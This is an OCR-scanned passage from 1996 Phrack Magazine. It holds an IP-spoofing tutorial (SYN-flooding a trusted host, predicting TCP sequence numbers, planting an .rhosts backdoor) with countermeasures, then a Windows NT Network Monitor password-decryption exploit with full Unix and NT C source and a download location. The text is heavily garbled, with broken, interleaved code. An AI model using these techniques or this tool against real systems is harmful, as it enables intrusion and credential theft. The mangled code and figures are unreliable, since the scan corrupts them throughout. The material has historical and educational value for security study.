number to every byte transfered, and requiring an acknowledgement from 
the other end upon receipt, TCP can guarant reliable delivery. The 
receiving end uses the sequence numbers to ensure proper ordering of 
the data and to eliminate duplicate data bytes. 
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TCP sequence numbers can simply be thought of as 32-bit 
counters. They range from 0 to 4,294,967,295. Every byte of 
data exchanged across a TCP connection (along with certain flags) 
is sequenced. The sequence number field in the TCP header will 
contain the sequence number of the *first* byte of data in the 
TCP segment. The acknowledgement number field in the TCP header 
holds the value of next *expected* sequence number, and also 
acknowledges *all* data up through this ACK number minus one. 

TCP uses the concept of window advertisement for flow 


control. It uses a sliding window to tell the other end how much 
data it can buffer. Since the window size is 16-bits a receiving TCP 
can advertise up to a maximum of 65535 bytes. Window advertisement 


can be thought of an advertisment from one TCP to the other of how 
high acceptable sequence numbers can be. 

Other TCP header flags of note are RST (reset), PSH (push) 
and FIN (finish). If a RST is received, the connection is 
immediately torn down. RSTs are normally sent when on nd 
receives a segment that just doesn’t jive with current connection 
(we will encounter an example below). The PSH flag tells the 
reciever to pass all the data is has queued to the aplication, as 
soon as possible. The FIN flag is the way an application begins a 
graceful close of a connection (connection termination is a 4-way 
process). When on nd recieves a FIN, it ACKs it, and does not 
expect to receive any more data (sending is still possible, however). 


--[{ TCP Connection Establishment ]-- 


In order to exchange data using TCP, hosts must establish a 
a connection. TCP establishes a connection in a 3 step process called 
the 3-way handshake. If machine A is running an rlogin client and 
wishes to conect to an rlogin daemon on machine B, the process is as 
follows: 


fig (1) 
al A —--SYN---> B 
2 A <---SYN/ACK--- B 
3 A ---ACK---> B 


At (1) the client is telling the server that it wants a connection. 
This is the SYN flag’s only purpose. The client is telling the 
server that the sequence number field is valid, and should be checked. 
The client will set the sequence number field in the TCP header to 
it’s ISN (initial sequence number). The server, upon receiving this 
segment (2) will respond with it’s own ISN (therefore the SYN flag is 
on) and an ACKnowledgement of the clients first segment (which is the 
client’s ISN+1). The client then ACK’s the server’s ISN (3). Now, 
data transfer may take place. 


--[ The ISN and Sequence Number Incrementation ]-- 


It is important to understand how sequence numbers ar 


initially choosen, and how they change with respect to time. The 
initial sequence number when a host is bootstraped is initialized 

to 1. (TCP actually calls this variable ’tcp_iss’ as it is the initial 
*send* sequence number. The other sequence number variable, 

‘tcp_irs’ is the initial *receive* sequence number and is learned 
during the 3-way connection establishment. We are not going to worry 
about the distinction.) This practice is wrong, and is acknowledged 
as so in a comment the tcp_init() function where it appears. The ISN 


is incremented by 128,000 every second, which causes the 32-bit ISN 


14.txt Wed Apr 26 09:43:41 2017 4 


counter to wrap every 9.32 hours if no connections occur. However, 
each time a connect() is issued, the counter is incremented by 
64,000. 


One important reason behind this predictibility is to 
minimize the chance that data from an older stale incarnation 
(that is, from the same 4-tuple of the local and remote 
IP-addresses TCP ports) of the current connection could arrive 
and foul things up. The concept of the 2MSL wait time applies 
here, but is beyond the scope of this paper. If sequence 
numbers were choosen at random when a connection arrived, no 
guarantees could be made that the sequence numbers would be different 
from a previous incarnation. If some data that was stuck ina 
routing loop somewhere finally freed itself and wandered into the new 
incarnation of it’s old connection, it could really foul things up. 


—>[) Ports a= 


To grant simultaneous access to the TCP module, TCP provides 
a user interface called a port. Ports are used by the kernel to 
identify network processes. These are strictly transport layer 
entities (that is to say that IP could care less about them). 
Together with an IP address, a TCP port provides provides an endpoint 
for network communications. In fact, at any given moment *all* 
Internet connections can be described by 4 numbers: the source IP 
address and source port and the destination IP address and destination 
port. Servers are bound to ’well-known’ ports so that they may be 
located on a standard port on different systems. For example, the 
rlogin daemon sits on TCP port 513. 


n 


ECTION II. THE ATTACK] 


...The devil finds work for idle hands.... 


--[ Briefly... ]-- 


IP-spoofing consists of several steps, which I will 
briefly outline here, then explain in detail. First, the target host 
is choosen. Next, a pattern of trust is discovered, along with a 
trusted host. The trusted host is then disabled, and the target’s TCP 
sequence numbers are sampled. The trusted host is impersonated, the 
sequence numbers guessed, and a connection attempt is made to a 
service that only requires address-based authentication. If 
successful, the attacker executes a simple command to leave a 
backdoor. 


--[ Needful Things ]-- 


There are a couple of things one needs to wage this attack: 


brain, mind, or other thinking device 
target host 

trusted host 

attacking host (with root access) 
IP-spoofing software 


PRR 
ea ae CES SS 


Generally the attack is made from the root account on the attacking 
host against the root account on the target. If the attacker is 
going to all this trouble, it would be stupid not to go for root. 
(Since root access is needed to wage the attack, this should not 

be an issue.) 
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--[ IP-Spoofing is a ’Blind Attack’ ]-- 


On 
is the fact 


often overlooked, but critical factor in IP-spoofing 

that the attack is blind. The attacker is going to be 
taking over the identity of a trusted host in order to subvert the 
security of the target host. The trusted host is disabled using the 
method described below. As far as the target knows, it is carrying on 
a conversation with a trusted pal. In reality, the attacker is 
sitting off in some dark corner of the Internet, forging packets 
puportedly from this trusted host while it is locked up in a denial 

of service battle. The IP datagrams sent with the forged IP-address 
reach the target fine (recall that IP is a connectionless-oriented 
protocol-- each datagram is sent without regard for the other end) 
but the datagrams the target sends back (destined for the trusted 
host) end up in the bit-bucket. The attacker never sees them. T 
intervening routers know where the datagrams are supposed to go. 
are supposed to go the trusted host. As far as the network layer 
concerned, this is where they originally came from, and this is w 
responses should go. Of course once the datagrams are routed th 
and the information is demultiplexed up the protocol stack, and 
reaches TCP, it is discarded (the trusted host’s TCP cannot respond-— 
see below). So the attacker has to be smart and *know* what was sent, 
and *know* what reponse the server is looking for. The attacker 
cannot see what the target host sends, but she can *predict* what it 
will send; that coupled with the knowledge of what it *will* send, 
allows the attacker to work around this blindness. 


he 
They 
is 

here 

r 


, 


--[ Patterns of Trust ]-- 


After a target is choosen the attacker must determine the 
patterns of trust (for the sake of argument, we are going to assume 
the target host *does* in fact trust somebody. If it didn’t, the 
attack would end here). Figuring out who a host trusts may or may 
not be easy. A ’showmount -e’ may show where filesystems ar 


exported, a 


nd rpcinfo can give out valuable information as well. 


If enough background information is known about the host, 


it should 


not be too difficult. If all else fails, trying neighboring IP 
addresses in a brute force effort may be a viable option. 


--[ Trusted Host Disabling Using the Flood of Sins J-- 


Once the trusted host is found, it must be disabled. Since 
the attacker is going to impersonate it, she must make sure this host 
cannot receive any network traffic and foul things up. There are 
many ways of doing this, the one I am going to discuss is TCP SYN 
flooding. 

A TCP connection is initiated with a client issuing a 
request to a server with the SYN flag on in the TCP header. Normally 
the server will issue a SYN/ACK back to the client identified by the 
32-bit source address in the IP header. The client will then send an 
ACK to the server (as we saw in figure 1 above) and data transfer 
can commence. There is an upper limit of how many concurrent SYN 
requests TCP can process for a given socket, however. This limit 
is called the backlog, and it is the length of the queue wher 
incoming (as yet incomplete) connections are kept. This queue limit 
applies to both the number of imcomplete connections (the 3-way 
handshake is not complete) and the number of completed connections 
that have not been pulled from the queue by the application by way of 
the accept() system call. If this backlog limit is reached, TCP will 
Silently discard all incoming SYN requests until the pending 
connections can be dealt with. Therein lies the attack. 
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The attacking host sends several SYN requests to the TCP port 
she desires disabled. The attacking host also must make sure that 
the source IP-address is spoofed to be that of another, currently 
unreachable host (the target TCP will be sending it’s response to 
this address. (IP may inform TCP that the host is unreachable, 
but TCP considers these errors to be transient and leaves the 
resolution of them up to IP (reroute the packets, etc) effectively 
ignoring them.) The IP-address must be unreachable because th 
attacker does not want any host to recieve the SYN/ACKs that will be 
coming from the target TCP (this would result in a RST being sent to 


the target TCP, which would foil our attack). The process is as 
follows: 
fig (2) 
1 Z (x) SAS YNES > B 
Z (x) ---SYN---> B 
Z (x) ---SYN---> B 
Z (x) ---SYN---> B 
Z (x) ---SYN---> B 
2 x <---SYN/ACK--—-— B 
xX <---SYN/ACK--—— B 
3 xX <---RST--- B 


At (1) the attacking host sends a multitude of SYN requests to the 
target (remember the target in this phase of the attack is the 
trusted host) to fill it’s backlog queue with pending connections. 
(2) The target responds with SYN/ACKs to what it believes is the 
source of the incoming SYNs. During this time all further requests 
to this TCP port will be ignored. 

Different TCP implementations have different backlog sizes. 
BSD generally has a backlog of 5 (Linux has a backlog of 6). There 
is also a 'grace’ margin of 3/2. That is, TCP will allow up to 
backlog*3/2+1 connections. This will allow a socket one connection 
even if it calls listen with a backlog of 0. 


AuthNote: [For a much more in-depth treatment of TCP SYN 
flooding, see my definitive paper on the subject. It covers the 
whole process in detail, in both theory, and practice. There is 
robust working code, a statistical analysis, and a legnthy paper. 
Look for it in issue 49 of Phrack. -daemon9 6/96] 


[ Sequence Number Sampling and Prediction ]-- 


Now the attacker needs to get an idea of where in the 32-bit 


sequence number space the target’s TCP is. The attacker connects to 
a TCP port on the target (SMTP is a good choice) just prior to launching 
the attack and completes the thr way handshake. The process is 


exactly the same as fig(1l), except that the attacker will save the 
value of the ISN sent by the target host. Often times, this process is 


repeated several times and the final ISN sent is stored. The attacker 
needs to get an idea of what the RTT (round-trip time) from the target 
to her host is like. (The process can be repeated several times, and an 


average of the RTT’s is calculated.) The RIT is necessary in being 
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able to accuratly predict the next ISN. The attacker has the baseline 
(the last ISN sent) and knows how the sequence numbers are incremented 
(128,000/second and 64,000 per connect) and now has a good idea of 
how long it will take an IP datagram to travel across the Internet to 
reach the target (approximately half the RIT, as most times the 
routes are symmetrical). After the attacker has this information, she 
immediately proceeds to the next phase of the attack (if another TCP 
connection were to arrive on any port of the target before th 
attacker was able to continue the attack, the ISN predicted by the 
attacker would be off by 64,000 of what was predicted). 

When the spoofed segment makes it’s way to the target, 
several different things may happen depending on the accuracy of 
the attacker’s prediction: 
- If the sequence number is EXACTly where the receiving TCP expects 
it to be, the incoming data will be placed on the next available 
position in the receive buffer. 
- If the sequence number is LESS than the expected value the data 
byte is considered a retransmission, and is discarded. 
- If the sequence number is GREATER than the expected value but 
still within the bounds of the receive window, the data byte is 
considered to be a future byte, and is held by TCP, pending the 
arrival of the other missing bytes. If a segment arrives with a 
sequence number GREATER than the expected value and NOT within the 
bounds of the receive window the segment is dropped, and TCP will 
send a segment back with the *expected* sequence number. 


—-[ Subversion... ]-- 


Here is where the main thrust of the attack begins: 


fig (3) 
i Z (b) —--SYN---> A 
2 B <---SYN/ACK--- A 
3 Z (b) —--ACK---> A 
4 Z (b) —--PSH---> A 


The attacking host spoofs her IP address to be that of the trusted 
host (which should still be in the death-throes of the D.O.S. attack) 
and sends it’s connection request to port 513 on the target (1). At 
(2), the target responds to the spoofed connection request with a 
SYN/ACK, which will make it’s way to the trusted host (which, if it 
*could* process the incoming TCP segment, it would consider it an 
error, and immediately send a RST to the target). If everything goes 
according to plan, the SYN/ACK will be dropped by the gagged trusted 
host. After (1), the attacker must back off for a bit to give the 
target ample time to send the SYN/ACK (the attacker cannot see this 
segment). Then, at (3) the attacker sends an ACK to the target with 
the predicted sequence number (plus one, because we’re ACKing it). 

If the attacker is correct in her prediction, the target will accept 
the ACK. The target is compromised and data transfer can 

commence (4). 

Generally, after compromise, the attacker will insert a 
backdoor into the system that will allow a simpler way of intrusion. 
(Often a ‘cat + + >> ~“/.rhosts* is done. This is a good idea for 
several reasons: it is quick, allows for simple re-entry, and is not 
interactive. Remember the attacker cannot see any traffic coming from 
the target, so any reponses are sent off into oblivion.) 
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--[ Why it Works J-- 


IP-Spoofing works because trusted services only rely on 
network address based authentication. Since IP is easily duped, 
address forgery is not difficult. The hardest part of the attck is 
in the sequence number prediction, because that is where the guesswork 
comes into play. Reduce unknowns and guesswork to a minimum, and 
the attack has a better chance of suceeding. Even a machine that 
wraps all it’s incoming TCP bound connections with Wietse Venema’s TCP 
wrappers, is still vulnerable to the attack. TCP wrappers rely ona 
hostname or an IP address for authentication... 


[SECTION III. PREVENTITIVE MEASURES ] 


...-A stich in time, saves nin 


—--[ Be Un-trusting and Un-trustworthy ]-- 


One easy solution to prevent this attack is not to rely 
on address-based authentication. Disable all the r* commands, 
remove all .rhosts files and empty out the /etc/hosts.equiv file. 
This will force all users to use other means of remote access 
(telnet, ssh, skey, etc). 


--[ Packet Filtering ]-- 


If your site has a direct connect to the Internet, you 
can use your router to help you out. First make sure only hosts 
on your internal LAN can particpate in trust-relationships (no 
internal host should trust a host outside the LAN). Then simply 
filter out *all* traffic from the outside (the Internet) that 
puports to come from the inside (the LAN). 


--[ Cryptographic Methods ]-- 


An obvious method to deter IP-spoofing is to require 
all network traffic to be encrypted and/or authenticated. While 
several solutions exist, it will be a while before such measures are 
deployed as defacto standards. 


--[ Initial Sequence Number Randomizing ]-- 


Since the sequence numbers are not choosen randomly (or 
incremented randomly) this attack works. Bellovin describes a 
fix for TCP that involves partitioning the sequence number space. 
Each connection would have it’s own seperate sequence number space. 
The sequence numbers would still be incremented as before, however, 
there would be no obvious or implied relationship between the 
numbering in these spaces. Suggested is the following formula: 


ISN=M+F (localhost, localport, remotehost, remoteport) 


Where M is the 4 microsecond timer and F is a cryptographic hash. 
F must not be computable from the outside or the attacker could 
still guess sequence numbers. Bellovin suggests F be a hash of 
the connection-id and a secret vector (a random number, or a host 
related secret combined with the machine’s boot time). 
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[SECTION IV. SOURCES] 


-Books: TCP/IP Illustrated vols. I, II & III 

-RFCs: 793, 1825, 1948 

—-People: Richard W. Stevens, and the users of the 
Information Nexus for proofreading 

—-Sourcecode: rbone, mendax, SYNflood 


This paper made possible by a grant from the Guild Corporation. 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 15 of 18 


Windows NT Network Monitor Exploitation 


NetMon Encryption Hammer 


by the AON and Route 
for Phrack Magazine 
May 1996 Guild productions, kid 


comments to daemon9@netcom.com 


Full exploit including binary dll’s and execuatables: 
ftp.infonexus.com/pub/TooldOfTheTrade/Windows/NT/netMonExploit.tgz 


[The intro] 


The Microsoft Network Monitor is a packet sniffer that runs under NT. 
It is a very robust and versatile packet sniffer, offering much more then 
simple ethernet frame capturing. It packs a robust capture/display filter 
language, powerful protocol parsers, and one snappy GUI. NetMon is 
delivered as part of the SMS package. The user portion of the program 
calls upon the services of the Network Monitor Agent, which is a kernel driver 
that ships with NT (3.5.x for sure, but I don’t know about 3.1). The Network 
Monitor Agent also provides an interface for a remote machine to connect and 
capture local data, provided it passes authentication. To restrict access, 
Network Monitor Agent utilizes a password authentication scheme. Access has 
two tiers: priviledge to view previously captured sessions, and priviledge to 
actually use the sniffer to place th thernet card in promiscuous mode. The 
acutal encrypted password is stored as a 32-byte binary string ina 
dynamically linked library file called BHSUPP.DLL. We have written code to 
extract this password from the dll and decyrpt it; we have broken th 
Microsoft Network Monitor password authentication system. 


[The low-down] 


The encrypted string is kept as binary data in: 
SSystemRoot%\system32\BHSUPP.DLL (in a default installation at least). 
BHSUPP.DLL is known to be different sizes between versions, so we cannot look 
for the encrypted string at a specific offset each time. Instead we must 
search for a flag, and seek 32-bytes past this flag. The flag is the 16-byte 
string: "RTSS&G--BEGIN--". (As a matter of note, there is a terminating 
footer also: "RTSS&G--END--".) 


[The encrypted truth] 


It is a simple encryption function, that takes random length string 
and returns 256-bit encrypted output. It may appear to be a hash, rather 
than a block cipher, but it is not. It does take a random length input, 
and produce a fixed output, but the input is always padded to 32-bytes 
(with nulls if necessary). The input to the function is a user defined 
arbitrary string. The input is truncated to 16 bytes and then to pad 
out the array, the whole original password string is concatenated on the 
truncated version, starting at the 16th byte. It doesn’t matter if the 
resulting string is longer than 32 bytes, as the cipher ignores anything 
past the 32nd byte. So: "loveKillsTheDemon" becomes: "loveKillsTheDemo" 
and then: "loveKillsTheDemoloveKillsTheDemon". If your password is 
smaller than 16 bytes, we get the ’hole-in-password’ phenomena. Since 
the array is intialized will nulls, and the password is still folded over to 
the 16th byte, these nulls remain. This is easily visible from the first line 
of output in our exploit code. It also accepts empty password strings 
readily, without choking, which all Microsoft products seem willing to do all 
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to easily. 
[The algorithm] 


The 32-byte string is put through 32 rounds of identical operations. 
The outer for loop controls the value of the byte to be XORed with the 
entire array that round (except for itself, see below). The inner loop steps 
through th ntire byte array. Each byte is permuted a total of 31 times 
(The discrepency comes from the test case where i must not be equal to j in 
order for a character to be permuted. It would make no sense to XOR a byte 
with itself). So, there are a total of 992 operations. The actual 
encryption algorithm is quite simple: 


fn: cs if (4!=4) mix[3]*=mix[i]+(i*4) +3; 


In English: if 1 is NOT equal to j, the 3 indexed char of mix is 
assigned the value of the j indexed char of mix XORed 
with the i indexed char of mix PLUS i XORed with j 


PLUS j. 
Mathematically: Le say k 

2) (Ke te ec ob 

3) de ae male [as] m 

4) m * mix[j] = x 

OR 


The methods used for obscurity are exclusive OR (XOR) and binary 
addition, (see the appendix if you are umfamiliar with these bitwise 
operations) with completely known vectors. The only unknown in the whole 
equation is the user entered password, fleshed out to 32-bytes. These 32 
bytes are taken through 32 rounds of permutations. Simple and concise, 
with no key material dropped, this algorithm is not lossy. Since it is not 
lossy it is 100% reversible, both in theory and practice. In fact, since we 
know the values of the counters i and j, throughout the entire encryption 
process, decryption is simply a matter of reproducing these values in the 
proper order. Since the output of the encryption process is the input, 
taken through 32 rounds of identical permutations, with known vectors, 
we simply need to reverse this process. 


[The code] 


There are two versions of the exploit available. A Windows NT version 
and, for those of you without access to an expensive NT-native compiler, 
there is a Unix version as well. The NT version is a console-based app, as 
GUI code would be a waste of time. The full package of this exploit, along 
with an NT exexcutable and sample DLL’s is available from: 
ftp.infonexus.com/pub/ToolsOfTheTrade/Windows/NT/netMonExploit.tgz 


[The discussion] 


The ramifications of this weak encryption in Network Monitor Agent are 
many. First off, the developers of Network Monitor Agent *didn’t* use the 
standard security mechanisms of Windows NT. This may be because the driver is 
a kernel mode driver, and in NT the kernel is a trusted enity, therefore 
the standard security API (of Win32) does not apply in the kernel making it 
harder to do user authentication. It also appears that they were trying to 
achieve a mechanism based not on priviledge, but on knowledge. It is very 
likely that in secured environment not all administrators should be able to 
sniff the network. The problem is they did a *poor* job of securing a 
powerful utility. 

The most straight forward attack is use Network Monitor to sniff the 
network (where you weren’t suppose to be able to) for priviledged user data or 
passwords in a heterogeneous environment (Since native NT networking does not 
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send password information in the clear, but standard TCP traffic from Unix 
is sent clear). The rest of the attacks would come from shabby administration 
, such as the administrator used the password for the admin account and the 
capture password in Network Monitor Agent (stupid, but likely) or the 
same password for Network Monitor Agent on all machines across the network. 

In order to use the exploit utility, one must have read priviledge for 
BHSUPP.DLL which is installed into %SystemRoot%\system32 by default. This 
is not a remote attack, but rather a stepping stone to gain priviledged 
information when one is under-priviledged. 


The moral] 
Time and time again we see either shody implementations of trusted 
algorithms, or, like in this case, just plain bad cryptography. Under ITAR, 
most secure cryptographic algorithms are classified as munitions, and are not 
exportable from this country. The funny thing is, under current law, one-way 
hashing functions are *not* restricted (that is why all Unix variants can ship 
with the standard crypt(3) libraries and executables). This authentication 
scheme could have *easily* been replaced by MD5, the same one-way hash used 
by PGP. At least then, the complexity of an attack would be increased to 

a brute-force known-plaintext sweep of key values... 


[The appendix] 


For the binary-declined... 


Exclusive OR 


The XOR operation is a bitwise operation with the following truth table: 


XOR| 1 | O | The Exclusive OR operation simply says: 
"...Hmmm, if I have a 1 anda 0, I’11 spit 

bo TL) Oi |. SE. af out al. Anything else, a 0..." 

Oo | 1 | 0 | 


Binary addition 


Binary addition is analogous to basel0 addition. However, each place holds 
2*n instead of 10%n... 
add| 1 O | basel0 base2 
HE 1011 
1 }1 Of 1 | hh 29) + 0101 
OQ. 9 [2 O | 6 10000 


This exploit made possbile by a grant from the Guild corporation. 
- May 07, 1996 route/aon 

[The Sourcecode] 

[Unix Version] 


/* 


Network Monitor Exploitation code, Unix version 
coded by daemon9 
The Guild, 1996 


*/ 


made possible by a grant from the Guild corporatio 


Engine "); 


laintext password from STDIN.\n"); 
laintext password from the dll.\n") 


/* Can’t switch getchar() as it locks the */ 
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include<string.h> 
include<stdio.h> 
include<fcntl.h> 
define fbufsize 8192 
define flag "RTSS&G--BEGIN--" 
define VERSION "Unix version\n" 
define BUFSIZE 48 
define DLLNAME "| /BHSUPP.DLL" 
int main () 
char *swirl(char *,int); 
char *recover(char *); 
void hexonx(char *); 
char werd[]={"\n\n\n\n.this code 
n.\n\0"}; 
char *plain, *tmp, *fname, *encrypted; 
int, e; 
printf (werd) ; 
printf ("\nNetMon Password Decryption 
printf (VERSION) ; 
printf("\t1l.\t\tEncrypt ap 
printf("\t2.\t\tDecrypt ap 
tmp=(char *)malloc(10); 


bzero(tmp,10); 
switch (atoi(gets (tmp) )) { 
case l: 
prinkst(™ 


Enter password to be encrypted 


/* fucking stream and makes futher I/O buggy*/ 


(note echo is on, 


d be a moot point\nto turn it off)\n->"); 


plain=(c 
bzero (plain, size 
gets (plain) ; 


har *)malloc(BUFSIZ 


RP). 
Bh), 
BE 
eh 


of (BUFSIZ 


); 


hexonx (swirl (plain,0)); 


break; 
case 2: 

printf (" 

fname=(c 


bzero(fname, sizeof (BUFSIZ 


gets (fname) ; 
if (fname [0] == 
if(! 


)s 


printf (" 
exit(1); 
} 


Enter name and path of DLL 
har *)malloc(BUFSIZ 


[./BHSUPP.DLL]:"); 


E); 


)); 


RP 
anh 


a 
bE 


trcpy (fname, DLLNAME) ; 


(encrypted=recover (fname) ) ) { 


Could not locate flag\n") 


hexonx (swirl (encrypted, 1)); 


break; 
default: 
printf ("\nFine. \ 
exit (0); 
} 
return 0; 


} 
/* 


swirl is the encryption/decryption function. 
string and, depending on the value of the mode variable, 
It returns a pointer to the string. 


decrypts it. 
aed 


char *swirl (byteStr,mode) 
char *byteStr; 
int mode; 


{ 


n") 


It takes an arbitrary length 
encrypts it or 


as it woul 
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int i=0,  3=0; 
char *mix, roundAndround[32] [32]; 
void hexonx(char *); 


mix=(char *)malloc(sizeof (byteStr))j; 


if (!mode) { 


memset (mix, 0,32); /* set 32 bytes of memory to 0 */ 


strncpy (mix,byteStr,16); /* copy the first 16 bytes of the p 


assword into the mix*/ 


char of the mix; 


hex */ 


} 
/* 


} 


memcpy (&émix[16],byteStr,strlen(byteStr)); /* copy password into the 16th 
if mix and plain overlap, problems occur */ 


printf ("Password upon entering encryption rounds:\n"); 
hexonx (mix); 

printf("\n\nbeginning 32 rounds of ’encryption’\n"); 
for (1=0;1<32; i++) for (j=0; 3<32; J++) if (i!=35) { 


mix[j]*=mix[i]+(i%* 3) +3; /* Sekret Enkripsion occurs 
memcpy (&roundAndround[i] [0],mix, 32); /* save a copy of each roun 
} 
printf("\nDo you wish to view the encryption process round by round?[y]"); 
switch (toupper (getchar())) { 
case 'N’: 
break; 
case 'Y': 
default: 
for (1=0;1i1<32;1++) { 
printf ("round %d:\n",i+1); /* print the rounds out in 


hexonx (&éroundAndround[i][0]); 
getc (stdin); 
} 
} 
printf ("\nEncrypted output:\n"); 
return (mix); 


if (mode) { 


strncpy (mix,byteStr, 32); 

for (i=31; i>=0;i--) for (j=31; j>=0; J--) if (i !=4) mix[4]*=mix[i]+(i*4) +3; 
mix[32]=0; 

printf ("\n\n\nThe plaintext is: %s\nIn hex:\n",mix); 

return (mix); 


hexonx simply prints out 32 bytes of hexidecimal characters. 


if. 


void hexonx (byteStr) 


char *byteStr; 


{ 


/* 


int i=0; 
for (;1<32;i++) printf ("O0xSx ",byteStr[i]); 
printf ("\n"); 


recover attempts to read the encrypted string from the dll 


*/ 


char *recover (fname) 


char *fname; 


{ 
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char buffer[fbufsize],*pass; 
int fd,i=0, j=0,demonFlag=0, offset, bufOffset=0; 


if ((fd=open (fname, O_RDONLY) ) <=0) { 
fprintf(stderr,"Cannot open %s\n",fname) ; 
exit(1); 
} 
while (read(fd,buffer, 8192) ) { 
i=0; 
while (i<fbufsizeéé&!demonFlag) { 
switch (buffer[i-4]) { 
case 'R’: 


if (buffer [i-3]=='T’ &é&buffer[i-2]=='S’ &&buff 
er[i-1]=='S’ &&buffer[i+l]=='’G’ é&buffer[it2]==' -’ &&buffer[it+3]=='-’ &&buffer[i+4]=='’B’ &é&buffe 


[i+10]=="-") { 


located at offset O0x%x\n",flag,offset); 


demonFlag+t+; 
bufOffset=i; 
/* Password is 32 bytes past end of header */ offset=j-4; 


BE’ &&buffer[it+6]=='G’ &é&buffer[it+7]=='I1’ &é&buffer[it+8]=='N’ &é&buffer[it+9]=='—-’ &é&buffer 


printf ("Encrypted Token Flag: ’%s’ 


printf ("Encrypted password should b 


e located at offset 0x%x\n",offsett+48); 


// 
// 


void DecryptPassword(LPBYTE lp 


define STRICT 
#define MAX FILE SIZE 24576 
ws, so must this 


} 
break; 
default: 


itt; 

jt+; 
} 

if (demonFlag) break; 

} 

if (!offset) return(0); 

pass=(char *)malloc(BUFSIZE) ; 

bzero (pass, 32); 

memcpy (pass, &buffer [bufOffset—4+48],32); 


printf("\nDo you wish to view the encrypted password?[y]"); 


switch (toupper (getchar())) { 
case 'N’: 
break; 
case /Y’: 
default: 
hexonx (pass) ; 
getc (stdin); 
} 


return (pass); 


[The Sourcecode] 
[NT Version] 


A Guild Production 1996 // 
Constructed by AON // 


include <windows.h> 
include <stdio.h> 


5 


//i£ BHSUPP.DLL gro 


iIncryptedPassword, LPSTR lpszPlaintextPassword) ; 


BOOL GetEncryptedPassword (HANDLE hTargetFile, LPBYTE lpEncryptedPassword) ; 
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void GetTargetFileFromUser (HANDLE* phTargetFile, LPSTR lpszTargetFile) ; 


HANDLE 


g_hStdIn, g_hStdOut; //global declaratio 


n of StandardIN and OUT 


// 


This is 


a console app. ReadFile and WriteFile used throughout so StdIN and StdOUT 


// can be redirected. 


void main(i 


{ 


cause 


nt argc, char* argv[]) 


HANDLE hTargetFile; 


BYTE lpEncryptedPassword[32]; 

char lpszPlaintextPassword[17] = {0}; 

char lpszOutputBuffer[80]; 

char lpszTargetFile[MAX_PATH] = {0}; 

char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL including filename] \n"; 
LPTSTR lpszSystemDirectory = NULL; 


UINT nCount, nCount2; 


//set gl 


g_hStdIn = GetStdHandle (STD_INPUT_HANDLE) 
g_hsStdOut = GetStdHandle (STD_OUTPUT_HANDL 


//check 


if(arge 


{ 


} 


lobal handles 


H~ 
~~ 
x 


for standard NT help switch 


> 1 && argv[1][0] == '/’ && argv[1][1] == '?’) 
//display usage info 
WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL); 


//exit with success 


ExitProcess (OL); 


//if path and file name not specified on commandline try system directory first, be 


//BHSUPP.DLL is probably there 


if(arge 


{ 


== 1) 


//findout how long path is for mem alloc 
nCount = GetSystemDirectory(lpszSystemDirectory, 0); 


//do alloc of that size 
lpszSystemDirectory = malloc(nCount) ; 


if (lpszSystemDirectory == NULL) 
{ 
WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n", 
41, &nCount, NULL); 


ExitProcess(1L); 


} 


//get system dir 
GetSystemDirectory (lpszSystemDirectory, nCount); 


//append file name to system directory 
sprintf (lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory) ; 


//celease memory 
free (lpszSystemDirectory) ; 
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else 
//get the commandline input 


strepy (lpszTargetFile, argv[1]); 


//try to open BHSUPP.DLL in the system dir or where the user instructed 
hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE READ | 


FILE SHARE WRITE, NULL, OPEN_EXIST 
ING, 
FILE _FLAG SEQUENTIAL SCAN, NULL); 
//if not on the commandline or in the system dir ask user for path 
if (hTargetFile == INVALID_HANDLE_VALUE && argc == 1) 
{ 
GetTargetFileFromUser (&hTargetFile, lpszTargetFile) ; 
} 
//aser gave bad path or they don’t have read permission on the file 
else if (hTargetFile == INVALID_HANDLE_VALUE) 
{ 
//make error string because file open failed 
nCount2 = sprintf (lpszOutputBuffer, "\nUnable to open %s\n", lpszTargetFile 
i 
//write out 
WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL); 
//exit with failure 
ExitProcess(1L); 
} 
//retrieve th ncerypted password from BHSUPP.DLL 
if ('GetEncryptedPassword(hTargetFile, lpEncryptedPassword) ) 
{ 
WriteFile(g_hStdOut, "Unable to retriev ncrypted password\n", 
39, &nCount, NULL); 
ExitProcess(1L); 
} 
//cleanup handle 
CloseHandle (hTargetFile) ; 
//do the decryption here 
DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword) ; 
//prepare for and print out results 
nCount2 = sprintf (lpszOutputBuffer, 
"\nThe Network Monitor Agent capture password is 
s\n", 


lpszPlaintextPassword) ; 
WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL); 


//close StandardIN and StandardOUT handles 
CloseHandle(g_hStdIn) ; 


CloseHandle (g_hStdOut) ; 


//exit with success 
ExitProcess (OL); 


//Ah yeah, here it is. 


void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR lpszPlaintextPassword) 
{ 
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register int outer, inner; 


//go backwards through loops to undo XOR 


for ( outer = 31; outer >= 0; outer-- ) 
{ 
for ( inner = 31; inner >= 0; inner-- ) 
{ 
if ( outer != inner ) 


{ 


lpEncryptedPassword[inner] *= lpEncryptedPassword[outer] + 


( 


A 


outer inner) + inner; 
} 
} 


} 


//since the original password was folded to fill 32 bytes only copy the first 16 bytes 
memcpy (lpszPlaintextPassword, lpEncryptedPassword, 16); 


//zero terminate this baby just incase it is actually a 16 byte password (yeah, rig 


ht!) 
lpszPlaintextPassword[16] = OL; 
return; 
} 
// get the path and file name for BHSUPP.DLL from the user in the case that it was 


// a custom install 
void GetTargetFileFromUser (HANDLE* phTargetFile, LPSTR lpszTargetFile) 
{ 


char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: "; 
UINT nCount; 


WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL); 
ReadFile(g_hStdin, lpszTargetFile, MAX_PATH, &nCount, NULL); 


//Tl had to account for the CR + LF that ReadFile counts in the nCount return value, 
//so I can zero terminate this string. 


lpszTargetFile[nCount - 2] = OL; 
*phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_ READ | 
FILE SHARE WRITE, NULL, OPEN_EXIST 
ING, 
